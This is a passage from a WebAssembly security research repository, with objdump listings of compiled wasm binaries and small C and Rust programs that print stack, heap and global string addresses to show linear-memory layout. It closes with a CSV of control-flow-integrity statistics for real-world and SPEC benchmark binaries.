  7 |    Import start=0x0000007b end=0x00000140 (size=0x000000c5) count: 9
  8 |  Function start=0x00000142 end=0x00000174 (size=0x00000032) count: 49
  9 |    Global start=0x00000176 end=0x0000017d (size=0x00000007) count: 1
 10 |    Export start=0x00000180 end=0x00000251 (size=0x000000d1) count: 15
 11 |      Elem start=0x00000253 end=0x00000263 (size=0x00000010) count: 1
 12 |      Code start=0x00000267 end=0x00004c4f (size=0x000049e8) count: 49
 13 |      Data start=0x00004c52 end=0x00004f1a (size=0x000002c8) count: 20
 14 | 
 15 | Section Details:
 16 | 
 17 | Type[16]:
 18 |  - type[0] (i32) -> i32
 19 |  - type[1] (i32, i32, i32) -> i32
 20 |  - type[2] (i32) -> nil
 21 |  - type[3] (i32, i32) -> nil
 22 |  - type[4] (i32, i32, i32) -> nil
 23 |  - type[5] (i32, i32) -> i32
 24 |  - type[6] () -> i32
 25 |  - type[7] (i32, f64, i32, i32, i32, i32) -> i32
 26 |  - type[8] (i32, i64, i32) -> i64
 27 |  - type[9] (i32, i32, i32, i32) -> i32
 28 |  - type[10] (i32, i32, i32, i32, i32) -> i32
 29 |  - type[11] (i64, i32) -> i32
 30 |  - type[12] (i32, i32, i32, i32, i32) -> nil
 31 |  - type[13] (i32, i32, f64, i32, i32, i32, i32) -> i32
 32 |  - type[14] (i64, i32, i32) -> i32
 33 |  - type[15] (f64, i32) -> f64
 34 | Import[9]:
 35 |  - func[0] sig=2 <env.abort> <- env.abort
 36 |  - func[1] sig=9 <env.___wasi_fd_write> <- env.___wasi_fd_write
 37 |  - func[2] sig=6 <env._emscripten_get_heap_size> <- env._emscripten_get_heap_size
 38 |  - func[3] sig=1 <env._emscripten_memcpy_big> <- env._emscripten_memcpy_big
 39 |  - func[4] sig=0 <env._emscripten_resize_heap> <- env._emscripten_resize_heap
 40 |  - func[5] sig=2 <env.setTempRet0> <- env.setTempRet0
 41 |  - global[0] i32 mutable=0 <- env.__table_base
 42 |  - memory[0] pages: initial=256 max=256 <- env.memory
 43 |  - table[0] elem_type=funcref init=10 max=10 <- env.table
 44 | Function[49]:
 45 |  - func[6] sig=0 <stackAlloc>
 46 |  - func[7] sig=6 <stackSave>
 47 |  - func[8] sig=2 <stackRestore>
 48 |  - func[9] sig=4
 49 |  - func[10] sig=2
 50 |  - func[11] sig=5 <_main>
 51 |  - func[12] sig=1
 52 |  - func[13] sig=6 <___errno_location>
 53 |  - func[14] sig=0
 54 |  - func[15] sig=8
 55 |  - func[16] sig=0
 56 |  - func[17] sig=0
 57 |  - func[18] sig=7
 58 |  - func[19] sig=3
 59 |  - func[20] sig=4
 60 |  - func[21] sig=10
 61 |  - func[22] sig=4
 62 |  - func[23] sig=0
 63 |  - func[24] sig=4
 64 |  - func[25] sig=14
 65 |  - func[26] sig=11
 66 |  - func[27] sig=11
 67 |  - func[28] sig=5
 68 |  - func[29] sig=12
 69 |  - func[30] sig=5
 70 |  - func[31] sig=5
 71 |  - func[32] sig=1
 72 |  - func[33] sig=0
 73 |  - func[34] sig=15
 74 |  - func[35] sig=1
 75 |  - func[36] sig=0
 76 |  - func[37] sig=3
 77 |  - func[38] sig=2
 78 |  - func[39] sig=0 <_malloc>
 79 |  - func[40] sig=2 <_free>
 80 |  - func[41] sig=0
 81 |  - func[42] sig=6 <_emscripten_get_sbrk_ptr>
 82 |  - func[43] sig=1 <_memcpy>
 83 |  - func[44] sig=1 <_memset>
 84 |  - func[45] sig=5 <dynCall_ii>
 85 |  - func[46] sig=13 <dynCall_iidiiii>
 86 |  - func[47] sig=9 <dynCall_iiii>
 87 |  - func[48] sig=4 <dynCall_vii>
 88 |  - func[49] sig=0
 89 |  - func[50] sig=7
 90 |  - func[51] sig=1
 91 |  - func[52] sig=8
 92 |  - func[53] sig=3
 93 |  - func[54] sig=10 <dynCall_jiji>
 94 | Global[1]:
 95 |  - global[1] i32 mutable=1 - init i32=5040
 96 | Export[15]:
 97 |  - func[13] <___errno_location> -> "___errno_location"
 98 |  - func[42] <_emscripten_get_sbrk_ptr> -> "_emscripten_get_sbrk_ptr"
 99 |  - func[40] <_free> -> "_free"
100 |  - func[11] <_main> -> "_main"
101 |  - func[39] <_malloc> -> "_malloc"
102 |  - func[43] <_memcpy> -> "_memcpy"
103 |  - func[44] <_memset> -> "_memset"
104 |  - func[45] <dynCall_ii> -> "dynCall_ii"
105 |  - func[46] <dynCall_iidiiii> -> "dynCall_iidiiii"
106 |  - func[47] <dynCall_iiii> -> "dynCall_iiii"
107 |  - func[54] <dynCall_jiji> -> "dynCall_jiji"
108 |  - func[48] <dynCall_vii> -> "dynCall_vii"
109 |  - func[6] <stackAlloc> -> "stackAlloc"
110 |  - func[8] <stackRestore> -> "stackRestore"
111 |  - func[7] <stackSave> -> "stackSave"
112 | Elem[1]:
113 |  - segment[0] table=0 count=10 - init global=0 <env.__table_base>
114 |   - elem[0] = func[49]
115 |   - elem[1] = func[14]
116 |   - elem[2] = func[50]
117 |   - elem[3] = func[18]
118 |   - elem[4] = func[51]
119 |   - elem[5] = func[12]
120 |   - elem[6] = func[52]
121 |   - elem[7] = func[15]
122 |   - elem[8] = func[53]
123 |   - elem[9] = func[19]
124 | Code[49]:
125 |  - func[6] size=27 <stackAlloc>
126 |  - func[7] size=4 <stackSave>
127 |  - func[8] size=6 <stackRestore>
128 |  - func[9] size=243
129 |  - func[10] size=158
130 |  - func[11] size=16 <_main>
131 |  - func[12] size=358
132 |  - func[13] size=5 <___errno_location>
133 |  - func[14] size=4
134 |  - func[15] size=4
135 |  - func[16] size=10
136 |  - func[17] size=142
137 |  - func[18] size=2992
138 |  - func[19] size=41
139 |  - func[20] size=346
140 |  - func[21] size=2450
141 |  - func[22] size=23
142 |  - func[23] size=64
143 |  - func[24] size=445
144 |  - func[25] size=51
145 |  - func[26] size=44
146 |  - func[27] size=131
147 |  - func[28] size=207
148 |  - func[29] size=129
149 |  - func[30] size=16
150 |  - func[31] size=288
151 |  - func[32] size=257
152 |  - func[33] size=126
153 |  - func[34] size=144
154 |  - func[35] size=32
155 |  - func[36] size=159
156 |  - func[37] size=38
157 |  - func[38] size=118
158 |  - func[39] size=6815 <_malloc>
159 |  - func[40] size=1991 <_free>
160 |  - func[41] size=77
161 |  - func[42] size=5 <_emscripten_get_sbrk_ptr>
162 |  - func[43] size=454 <_memcpy>
163 |  - func[44] size=280 <_memset>
164 |  - func[45] size=12 <dynCall_ii>
165 |  - func[46] size=25 <dynCall_iidiiii>
166 |  - func[47] size=19 <dynCall_iiii>
167 |  - func[48] size=17 <dynCall_vii>
168 |  - func[49] size=8
169 |  - func[50] size=8
170 |  - func[51] size=8
171 |  - func[52] size=8
172 |  - func[53] size=6
173 |  - func[54] size=40 <dynCall_jiji>
174 | Data[20]:
175 |  - segment[0] size=65 - init i32=1024
176 |   - 0000400: 1100 0a00 1111 1100 0000 0005 0000 0000  ................
177 |   - 0000410: 0000 0900 0000 000b 0000 0000 0000 0000  ................
178 |   - 0000420: 1100 0f0a 1111 1103 0a07 0001 1309 0b0b  ................
179 |   - 0000430: 0000 0906 0b00 000b 0006 1100 0000 1111  ................
180 |   - 0000440: 11                                       .
181 |  - segment[1] size=33 - init i32=1105
182 |   - 0000451: 0b00 0000 0000 0000 0011 000a 0a11 1111  ................
183 |   - 0000461: 000a 0000 0200 090b 0000 0009 000b 0000  ................
184 |   - 0000471: 0b                                       .
185 |  - segment[2] size=1 - init i32=1163
186 |   - 000048b: 0c                                       .
187 |  - segment[3] size=21 - init i32=1175
188 |   - 0000497: 0c00 0000 000c 0000 0000 090c 0000 0000  ................
189 |   - 00004a7: 000c 0000 0c                             .....
190 |  - segment[4] size=1 - init i32=1221
191 |   - 00004c5: 0e                                       .
192 |  - segment[5] size=21 - init i32=1233
193 |   - 00004d1: 0d00 0000 040d 0000 0000 090e 0000 0000  ................
194 |   - 00004e1: 000e 0000 0e                             .....
195 |  - segment[6] size=1 - init i32=1279
196 |   - 00004ff: 10                                       .
197 |  - segment[7] size=30 - init i32=1291
198 |   - 000050b: 0f00 0000 000f 0000 0000 0910 0000 0000  ................
199 |   - 000051b: 0010 0000 1000 0012 0000 0012 1212       ..............
200 |  - segment[8] size=14 - init i32=1346
201 |   - 0000542: 1200 0000 1212 1200 0000 0000 0009       ..............
202 |  - segment[9] size=1 - init i32=1395
203 |   - 0000573: 0b                                       .
204 |  - segment[10] size=21 - init i32=1407
205 |   - 000057f: 0a00 0000 000a 0000 0000 090b 0000 0000  ................
206 |   - 000058f: 000b 0000 0b                             .....
207 |  - segment[11] size=1 - init i32=1453
208 |   - 00005ad: 0c                                       .
209 |  - segment[12] size=40 - init i32=1465
210 |   - 00005b9: 0c00 0000 000c 0000 0000 090c 0000 0000  ................
211 |   - 00005c9: 000c 0000 0c00 0030 3132 3334 3536 3738  .......012345678
212 |   - 00005d9: 3941 4243 4445 4605                      9ABCDEF.
213 |  - segment[13] size=1 - init i32=1516
214 |   - 00005ec: 01                                       .
215 |  - segment[14] size=14 - init i32=1540
216 |   - 0000604: 0100 0000 0100 0000 a808 0000 0004       ..............
217 |  - segment[15] size=1 - init i32=1564
218 |   - 000061c: 01                                       .
219 |  - segment[16] size=5 - init i32=1579
220 |   - 000062b: 0aff ffff ff                             .....
221 |  - segment[17] size=2 - init i32=1648
222 |   - 0000670: e005                                     ..
223 |  - segment[18] size=2 - init i32=1828
224 |   - 0000724: d80c                                     ..
225 |  - segment[19] size=315 - init i32=1884
226 |   - 000075c: 676c 6f62 616c 2063 6f6e 7374 2073 7472  global const str
227 |   - 000076c: 696e 6700 2020 2020 2573 2c20 6164 6472  ing.    %s, addr
228 |   - 000077c: 3a20 2570 2028 256c 7529 0a00 2020 2020  : %p (%lu)..    
229 |   - 000078c: 7374 6163 6b20 7661 6c75 6520 696e 206c  stack value in l
230 |   - 000079c: 6561 6628 2920 6675 6e63 7469 6f6e 2c20  eaf() function, 
231 |   - 00007ac: 6164 6472 3a20 2570 2028 256c 7529 0a00  addr: %p (%lu)..
232 |   - 00007bc: 2020 2020 7374 6163 6b20 6772 6f77 733a      stack grows:
233 |   - 00007cc: 2025 6c64 0a00 2020 2020 6172 6776 5b30   %ld..    argv[0
234 |   - 00007dc: 5d3a 2025 732c 2061 6464 723a 2025 7020  ]: %s, addr: %p 
235 |   - 00007ec: 2825 6c75 290a 0073 7461 636b 2d61 6c6c  (%lu)..stack-all
236 |   - 00007fc: 6f63 6174 6564 2028 6c6f 6361 6c29 2073  ocated (local) s
237 |   - 000080c: 7472 696e 6700 6479 6e61 6d69 6361 6c6c  tring.dynamicall
238 |   - 000081c: 7920 2868 6561 7029 2061 6c6c 6f63 6174  y (heap) allocat
239 |   - 000082c: 6564 2073 7472 696e 6700 2020 696e 206c  ed string.  in l
240 |   - 000083c: 6561 6628 2900 2020 696e 2069 6e74 6572  eaf().  in inter
241 |   - 000084c: 6d65 6469 6174 6528 2900 2020 696e 206d  mediate().  in m
242 |   - 000085c: 6169 6e28 2900 2d2b 2020 2030 5830 7800  ain().-+   0X0x.
243 |   - 000086c: 286e 756c 6c29 002d 3058 2b30 5820 3058  (null).-0X+0X 0X
244 |   - 000087c: 2d30 782b 3078 2030 7800 696e 6600 494e  -0x+0x 0x.inf.IN
245 |   - 000088c: 4600 6e61 6e00 4e41 4e00 2e              F.nan.NAN..
246 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/emcc-upstream.js.stdout:
--------------------------------------------------------------------------------
 1 |   in main()
 2 |   in intermediate()
 3 |   in leaf()
 4 |     global const string, addr: 0x400 (1024)
 5 |     stack-allocated (local) string, addr: 0x500e30 (5246512)
 6 |     stack value in leaf() function, addr: 0x500e2c (5246508)
 7 |     stack grows: -4
 8 |     dynamically (heap) allocated string, addr: 0x500f88 (5246856)
 9 |     argv[0]: /mnt/Data/Documents/SOLA/WebAssembly/security/evaluations/memory-layout/emcc-upstream.js, addr: 0x500e70 (5246576)
10 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/emcc-upstream.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/linear-memory-analysis/emcc-upstream.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/emcc-upstream.wasm.objdump:
--------------------------------------------------------------------------------
  1 | 
  2 | emcc-upstream.wasm:	file format wasm 0x1
  3 | 
  4 | Sections:
  5 | 
  6 |      Type start=0x0000000a end=0x0000006a (size=0x00000060) count: 15
  7 |    Import start=0x0000006d end=0x000000fa (size=0x0000008d) count: 6
  8 |  Function start=0x000000fc end=0x00000126 (size=0x0000002a) count: 41
  9 |    Global start=0x00000128 end=0x00000137 (size=0x0000000f) count: 2
 10 |    Export start=0x0000013a end=0x000001f7 (size=0x000000bd) count: 14
 11 |      Elem start=0x000001f9 end=0x00000202 (size=0x00000009) count: 1
 12 |      Code start=0x00000205 end=0x00003877 (size=0x00003672) count: 41
 13 |      Data start=0x0000387a end=0x00003b24 (size=0x000002aa) count: 21
 14 | 
 15 | Section Details:
 16 | 
 17 | Type[15]:
 18 |  - type[0] (i32) -> i32
 19 |  - type[1] (i32, i32, i32) -> i32
 20 |  - type[2] (i32) -> nil
 21 |  - type[3] (i32, i32, i32) -> nil
 22 |  - type[4] (i32, i32) -> i32
 23 |  - type[5] (i32, i32) -> nil
 24 |  - type[6] () -> i32
 25 |  - type[7] (i32, i32, i32, i32) -> i32
 26 |  - type[8] (i32, i32, i32, i32, i32) -> i32
 27 |  - type[9] (i64, i32) -> i32
 28 |  - type[10] (i32, i64, i32) -> i64
 29 |  - type[11] () -> nil
 30 |  - type[12] (i32, i32, i32, i32, i32) -> nil
 31 |  - type[13] (i32, f64, i32, i32, i32, i32) -> i32
 32 |  - type[14] (i64, i32, i32) -> i32
 33 | Import[6]:
 34 |  - func[0] sig=7 <wasi_snapshot_preview1.fd_write> <- wasi_snapshot_preview1.fd_write
 35 |  - func[1] sig=0 <env.emscripten_resize_heap> <- env.emscripten_resize_heap
 36 |  - func[2] sig=1 <env.emscripten_memcpy_big> <- env.emscripten_memcpy_big
 37 |  - func[3] sig=2 <env.setTempRet0> <- env.setTempRet0
 38 |  - memory[0] pages: initial=256 max=256 <- env.memory
 39 |  - table[0] elem_type=funcref init=4 max=0 <- env.table
 40 | Function[41]:
 41 |  - func[4] sig=11 <__wasm_call_ctors>
 42 |  - func[5] sig=3
 43 |  - func[6] sig=2
 44 |  - func[7] sig=4 <main>
 45 |  - func[8] sig=5
 46 |  - func[9] sig=6 <__errno_location>
 47 |  - func[10] sig=0
 48 |  - func[11] sig=4
 49 |  - func[12] sig=4
 50 |  - func[13] sig=4
 51 |  - func[14] sig=1
 52 |  - func[15] sig=1
 53 |  - func[16] sig=3
 54 |  - func[17] sig=8
 55 |  - func[18] sig=3
 56 |  - func[19] sig=0
 57 |  - func[20] sig=3
 58 |  - func[21] sig=12
 59 |  - func[22] sig=9
 60 |  - func[23] sig=14
 61 |  - func[24] sig=9
 62 |  - func[25] sig=0
 63 |  - func[26] sig=2
 64 |  - func[27] sig=0
 65 |  - func[28] sig=0
 66 |  - func[29] sig=10
 67 |  - func[30] sig=1
 68 |  - func[31] sig=2
 69 |  - func[32] sig=0 <malloc>
 70 |  - func[33] sig=2 <free>
 71 |  - func[34] sig=0
 72 |  - func[35] sig=3
 73 |  - func[36] sig=3
 74 |  - func[37] sig=5 <setThrew>
 75 |  - func[38] sig=6 <stackSave>
 76 |  - func[39] sig=0 <stackAlloc>
 77 |  - func[40] sig=2 <stackRestore>
 78 |  - func[41] sig=0 <__growWasmMemory>
 79 |  - func[42] sig=4 <dynCall_ii>
 80 |  - func[43] sig=7 <dynCall_iiii>
 81 |  - func[44] sig=8 <dynCall_jiji>
 82 | Global[2]:
 83 |  - global[0] i32 mutable=1 - init i32=5246688
 84 |  - global[1] i32 mutable=0 <__data_end> - init i32=3808
 85 | Export[14]:
 86 |  - func[4] <__wasm_call_ctors> -> "__wasm_call_ctors"
 87 |  - func[32] <malloc> -> "malloc"
 88 |  - func[7] <main> -> "main"
 89 |  - func[9] <__errno_location> -> "__errno_location"
 90 |  - func[37] <setThrew> -> "setThrew"
 91 |  - func[33] <free> -> "free"
 92 |  - global[1] -> "__data_end"
 93 |  - func[38] <stackSave> -> "stackSave"
 94 |  - func[39] <stackAlloc> -> "stackAlloc"
 95 |  - func[40] <stackRestore> -> "stackRestore"
 96 |  - func[41] <__growWasmMemory> -> "__growWasmMemory"
 97 |  - func[42] <dynCall_ii> -> "dynCall_ii"
 98 |  - func[43] <dynCall_iiii> -> "dynCall_iiii"
 99 |  - func[44] <dynCall_jiji> -> "dynCall_jiji"
100 | Elem[1]:
101 |  - segment[0] table=0 count=3 - init i32=1
102 |   - elem[1] = func[28]
103 |   - elem[2] = func[30]
104 |   - elem[3] = func[29]
105 | Code[41]:
106 |  - func[4] size=3 <__wasm_call_ctors>
107 |  - func[5] size=218
108 |  - func[6] size=137
109 |  - func[7] size=16 <main>
110 |  - func[8] size=39
111 |  - func[9] size=5 <__errno_location>
112 |  - func[10] size=10
113 |  - func[11] size=273
114 |  - func[12] size=17
115 |  - func[13] size=222
116 |  - func[14] size=181
117 |  - func[15] size=53
118 |  - func[16] size=331
119 |  - func[17] size=2218
120 |  - func[18] size=23
121 |  - func[19] size=66
122 |  - func[20] size=326
123 |  - func[21] size=119
124 |  - func[22] size=45
125 |  - func[23] size=52
126 |  - func[24] size=131
127 |  - func[25] size=89
128 |  - func[26] size=106
129 |  - func[27] size=143
130 |  - func[28] size=4
131 |  - func[29] size=4
132 |  - func[30] size=326
133 |  - func[31] size=126
134 |  - func[32] size=5857 <malloc>
135 |  - func[33] size=1665 <free>
136 |  - func[34] size=80
137 |  - func[35] size=511
138 |  - func[36] size=369
139 |  - func[37] size=28 <setThrew>
140 |  - func[38] size=4 <stackSave>
141 |  - func[39] size=16 <stackAlloc>
142 |  - func[40] size=6 <stackRestore>
143 |  - func[41] size=6 <__growWasmMemory>
144 |  - func[42] size=9 <dynCall_ii>
145 |  - func[43] size=13 <dynCall_iiii>
146 |  - func[44] size=34 <dynCall_jiji>
147 | Data[21]:
148 |  - segment[0] size=278 - init i32=1024
149 |   - 0000400: 676c 6f62 616c 2063 6f6e 7374 2073 7472  global const str
150 |   - 0000410: 696e 6700 2020 2020 2573 2c20 6164 6472  ing.    %s, addr
151 |   - 0000420: 3a20 2570 2028 256c 7529 0a00 2020 2020  : %p (%lu)..    
152 |   - 0000430: 7374 6163 6b20 7661 6c75 6520 696e 206c  stack value in l
153 |   - 0000440: 6561 6628 2920 6675 6e63 7469 6f6e 2c20  eaf() function, 
154 |   - 0000450: 6164 6472 3a20 2570 2028 256c 7529 0a00  addr: %p (%lu)..
155 |   - 0000460: 2020 2020 7374 6163 6b20 6772 6f77 733a      stack grows:
156 |   - 0000470: 2025 6c64 0a00 2020 2020 6172 6776 5b30   %ld..    argv[0
157 |   - 0000480: 5d3a 2025 732c 2061 6464 723a 2025 7020  ]: %s, addr: %p 
158 |   - 0000490: 2825 6c75 290a 0073 7461 636b 2d61 6c6c  (%lu)..stack-all
159 |   - 00004a0: 6f63 6174 6564 2028 6c6f 6361 6c29 2073  ocated (local) s
160 |   - 00004b0: 7472 696e 6700 6479 6e61 6d69 6361 6c6c  tring.dynamicall
161 |   - 00004c0: 7920 2868 6561 7029 2061 6c6c 6f63 6174  y (heap) allocat
162 |   - 00004d0: 6564 2073 7472 696e 6700 2020 696e 206c  ed string.  in l
163 |   - 00004e0: 6561 6628 2900 2020 696e 2069 6e74 6572  eaf().  in inter
164 |   - 00004f0: 6d65 6469 6174 6528 2900 2020 696e 206d  mediate().  in m
165 |   - 0000500: 6169 6e28 2900 2d2b 2020 2030 5830 7800  ain().-+   0X0x.
166 |   - 0000510: 286e 756c 6c29                           (null)
167 |  - segment[1] size=65 - init i32=1312
168 |   - 0000520: 1100 0a00 1111 1100 0000 0005 0000 0000  ................
169 |   - 0000530: 0000 0900 0000 000b 0000 0000 0000 0000  ................
170 |   - 0000540: 1100 0f0a 1111 1103 0a07 0001 1309 0b0b  ................
171 |   - 0000550: 0000 0906 0b00 000b 0006 1100 0000 1111  ................
172 |   - 0000560: 11                                       .
173 |  - segment[2] size=33 - init i32=1393
174 |   - 0000571: 0b00 0000 0000 0000 0011 000a 0a11 1111  ................
175 |   - 0000581: 000a 0000 0200 090b 0000 0009 000b 0000  ................
176 |   - 0000591: 0b                                       .
177 |  - segment[3] size=1 - init i32=1451
178 |   - 00005ab: 0c                                       .
179 |  - segment[4] size=21 - init i32=1463
180 |   - 00005b7: 0c00 0000 000c 0000 0000 090c 0000 0000  ................
181 |   - 00005c7: 000c 0000 0c                             .....
182 |  - segment[5] size=1 - init i32=1509
183 |   - 00005e5: 0e                                       .
184 |  - segment[6] size=21 - init i32=1521
185 |   - 00005f1: 0d00 0000 040d 0000 0000 090e 0000 0000  ................
186 |   - 0000601: 000e 0000 0e                             .....
187 |  - segment[7] size=1 - init i32=1567
188 |   - 000061f: 10                                       .
189 |  - segment[8] size=30 - init i32=1579
190 |   - 000062b: 0f00 0000 000f 0000 0000 0910 0000 0000  ................
191 |   - 000063b: 0010 0000 1000 0012 0000 0012 1212       ..............
192 |  - segment[9] size=14 - init i32=1634
193 |   - 0000662: 1200 0000 1212 1200 0000 0000 0009       ..............
194 |  - segment[10] size=1 - init i32=1683
195 |   - 0000693: 0b                                       .
196 |  - segment[11] size=21 - init i32=1695
197 |   - 000069f: 0a00 0000 000a 0000 0000 090b 0000 0000  ................
198 |   - 00006af: 000b 0000 0b                             .....
199 |  - segment[12] size=1 - init i32=1741
200 |   - 00006cd: 0c                                       .
201 |  - segment[13] size=41 - init i32=1753
202 |   - 00006d9: 0c00 0000 000c 0000 0000 090c 0000 0000  ................
203 |   - 00006e9: 000c 0000 0c00 0030 3132 3334 3536 3738  .......012345678
204 |   - 00006f9: 3941 4243 4445 46f8 07                   9ABCDEF..
205 |  - segment[14] size=1 - init i32=1801
206 |   - 0000709: 04                                       .
207 |  - segment[15] size=2 - init i32=1980
208 |   - 00007bc: bc08                                     ..
209 |  - segment[16] size=1 - init i32=2040
210 |   - 00007f8: 05                                       .
211 |  - segment[17] size=1 - init i32=2052
212 |   - 0000804: 01                                       .
213 |  - segment[18] size=14 - init i32=2076
214 |   - 000081c: 0200 0000 0300 0000 e808 0000 0004       ..............
215 |  - segment[19] size=1 - init i32=2100
216 |   - 0000834: 01                                       .
217 |  - segment[20] size=5 - init i32=2115
218 |   - 0000843: 0aff ffff ff                             .....
219 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/main.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | #include <inttypes.h> // for uintptr_t
 5 | 
 6 | const char * const_str = "global const string";
 7 | 
 8 | __attribute__((noinline))
 9 | void leaf(char * arg_str, char * stack_str, char * heap_str) {
10 |   int stack_callee = 42;
11 | 
12 |   printf("  in leaf()\n");
13 | 
14 |   printf("    %s, addr: %p (%lu)\n", const_str, const_str, (uintptr_t) const_str);
15 |   printf("    %s, addr: %p (%lu)\n", stack_str, stack_str, (uintptr_t) stack_str);
16 |   printf("    stack value in leaf() function, addr: %p (%lu)\n", &stack_callee, (uintptr_t) &stack_callee);
17 |   printf("    stack grows: %ld\n", ((void*) &stack_callee) - ((void*) stack_str));
18 |   printf("    %s, addr: %p (%lu)\n", heap_str, heap_str, (uintptr_t) heap_str);
19 |   printf("    argv[0]: %s, addr: %p (%lu)\n", arg_str, arg_str, (uintptr_t) arg_str);
20 | }
21 | 
22 | __attribute__((noinline))
23 | void intermediate(char * arg_str) {
24 |   char stack_str[64];
25 |   strcpy(stack_str, "stack-allocated (local) string");
26 |   
27 |   char * heap_str = (char*) malloc(64*sizeof(char));
28 |   strcpy(heap_str, "dynamically (heap) allocated string");
29 | 
30 |   printf("  in intermediate()\n");
31 |   leaf(arg_str, stack_str, heap_str);
32 | }
33 | 
34 | int main(int argc, char **argv) {
35 |   printf("  in main()\n");
36 |   intermediate(argv[0]);
37 |   return 0;
38 | }
39 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/main.rs:
--------------------------------------------------------------------------------
 1 | use std::str;
 2 | use std::env::args;
 3 | 
 4 | const CONST_STR: &str = "global const string";
 5 | 
 6 | #[inline(never)]
 7 | fn leaf(arg_str: &str, stack_str: &str, heap_str: &str) {
 8 |     let stack_callee = 42;
 9 |     let stack_callee_ptr = &stack_callee as *const i32;
10 | 
11 |     println!("  in leaf()");
12 | 
13 |     println!("    {}, addr: {:?} ({})", CONST_STR, CONST_STR as *const str, CONST_STR as *const str as *const () as usize);
14 |     println!("    {}, addr: {:?} ({})", stack_str, stack_str as *const str, stack_str as *const str as *const () as usize);
15 |     println!("    stack value in leaf() function, addr: {:?} ({})", stack_callee_ptr, stack_callee_ptr as usize);
16 |     println!("    stack grows: {:?}", (stack_callee_ptr as usize as isize) - (stack_str as *const str as *const () as usize as isize));
17 |     println!("    {}, addr: {:?} ({})", heap_str, heap_str as *const str, heap_str as *const str as *const () as usize);
18 |     println!("    arg 0: {}, addr: {:?} ({})", arg_str, arg_str as *const str, arg_str  as *const str as *const () as usize);
19 | }
20 | 
21 | #[inline(never)]
22 | fn intermediate(arg_str: &str) {
23 |     let mut stack_str = [0u8; 30];
24 |     stack_str.clone_from_slice("stack-allocated (local) string".as_bytes());
25 |     let stack_str = unsafe { str::from_utf8_unchecked(&stack_str) };
26 | 
27 |     let heap_str = "dynamically (heap) allocated string".to_string();
28 | 
29 |     println!("  in intermediate()");
30 |     leaf(arg_str, stack_str, &heap_str);
31 | }
32 | 
33 | fn main() {
34 |     println!("  in main()");
35 |     intermediate(args().next().unwrap().as_str());
36 | }


--------------------------------------------------------------------------------
/linear-memory-analysis/rust-wasi.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/linear-memory-analysis/rust-wasi.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/rust-wasi.wasm.stdout:
--------------------------------------------------------------------------------
 1 |   in main()
 2 |   in intermediate()
 3 |   in leaf()
 4 |     global const string, addr: 0x1000e0 (1048800)
 5 |     stack-allocated (local) string, addr: 0xfff58 (1048408)
 6 |     stack value in leaf() function, addr: 0xfff08 (1048328)
 7 |     stack grows: -80
 8 |     dynamically (heap) allocated string, addr: 0x1104f0 (1115376)
 9 |     arg 0: rust-wasi.wasm, addr: 0x110530 (1115440)
10 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/overview-table.csv:
--------------------------------------------------------------------------------
 1 | "program","instructions","direct calls","indirect calls","functions","funcs in table init","funcs with indirect call index from memory","CFI classes","CFI class size min","CFI class size max","CFI class size avg","CFI class size median"
 2 | "real-world/1password-extension/dac34eee5ed4216c65b2.module.wasm.txt:cfi_latex_csv_sum_avg_line:1password-extension",730169,19527,283,1941,596,586,19,1,91,"14,8947368421053",5
 3 | "real-world/adobe-cloudview/wasm_acrobat.wasm.txt:cfi_latex_csv_sum_avg_line:adobe-cloudview",1056288,42175,2803,12566,3076,3054,87,1,848,"32,2183908045977",3
 4 | "real-world/d3demo/d3wasm.wasm.txt:cfi_latex_csv_sum_avg_line:d3demo",1735381,39337,17903,8239,4449,4408,642,1,3889,"27,886292834891",1
 5 | "real-world/figma-web-application/compiled_wasm.wasm.txt:cfi_latex_csv_sum_avg_line:figma-web-application",3168186,118190,10469,13619,3657,3635,68,1,4519,"153,955882352941",6
 6 | "real-world/squoosh-imagecodecs/hqx-rs-8c087e0290bb39f1e090.module.wasm.txt:cfi_latex_csv_sum_avg_line:squoosh-imagecodecs",111437,5891,34,73,17,15,4,1,16,"8,5",16
 7 | "real-world/squoosh-imagecodecs/mozjpeg_enc.93395.wasm.txt:cfi_latex_csv_sum_avg_line:squoosh-imagecodecs",77684,1059,298,388,135,116,28,1,169,"10,6428571428571",3
 8 | "real-world/squoosh-imagecodecs/optipng.4e77b.wasm.txt:cfi_latex_csv_sum_avg_line:squoosh-imagecodecs",119159,2971,169,735,152,124,28,1,34,"6,03571428571429",2
 9 | "real-world/squoosh-imagecodecs/webp_dec.fa0ab.wasm.txt:cfi_latex_csv_sum_avg_line:squoosh-imagecodecs",43407,1200,69,563,160,107,20,1,9,"3,45",4
10 | "real-world/squoosh-imagecodecs/webp_enc.ea665.wasm.txt:cfi_latex_csv_sum_avg_line:squoosh-imagecodecs",73089,2311,87,889,165,69,22,1,15,"3,95454545454545",2
11 | "spec_cpu2017/upstream/500.perlbench_r/perlbench_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:500.perlbench",837796,26685,425,2128,980,956,31,1,93,"13,7096774193548",6
12 | "spec_cpu2017/upstream/502.gcc_r/cpugcc_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:502.gcc",2871772,139512,3642,9541,3394,3375,78,1,982,"46,6923076923077",2
13 | "spec_cpu2017/upstream/505.mcf_r/mcf_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:505.mcf",27418,457,44,136,12,8,7,1,28,"6,28571428571429",1
14 | "spec_cpu2017/upstream/508.namd_r/namd_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:508.namd",323031,3678,41,296,124,107,15,1,12,"2,73333333333333",2
15 | "spec_cpu2017/upstream/510.parest_r/parest_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:510.parest",1040442,46224,1229,3762,2864,2714,97,1,199,"12,6701030927835",1
16 | "spec_cpu2017/upstream/511.povray_r/povray_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:511.povray",385391,11752,228,1421,521,510,29,1,57,"7,86206896551724",2
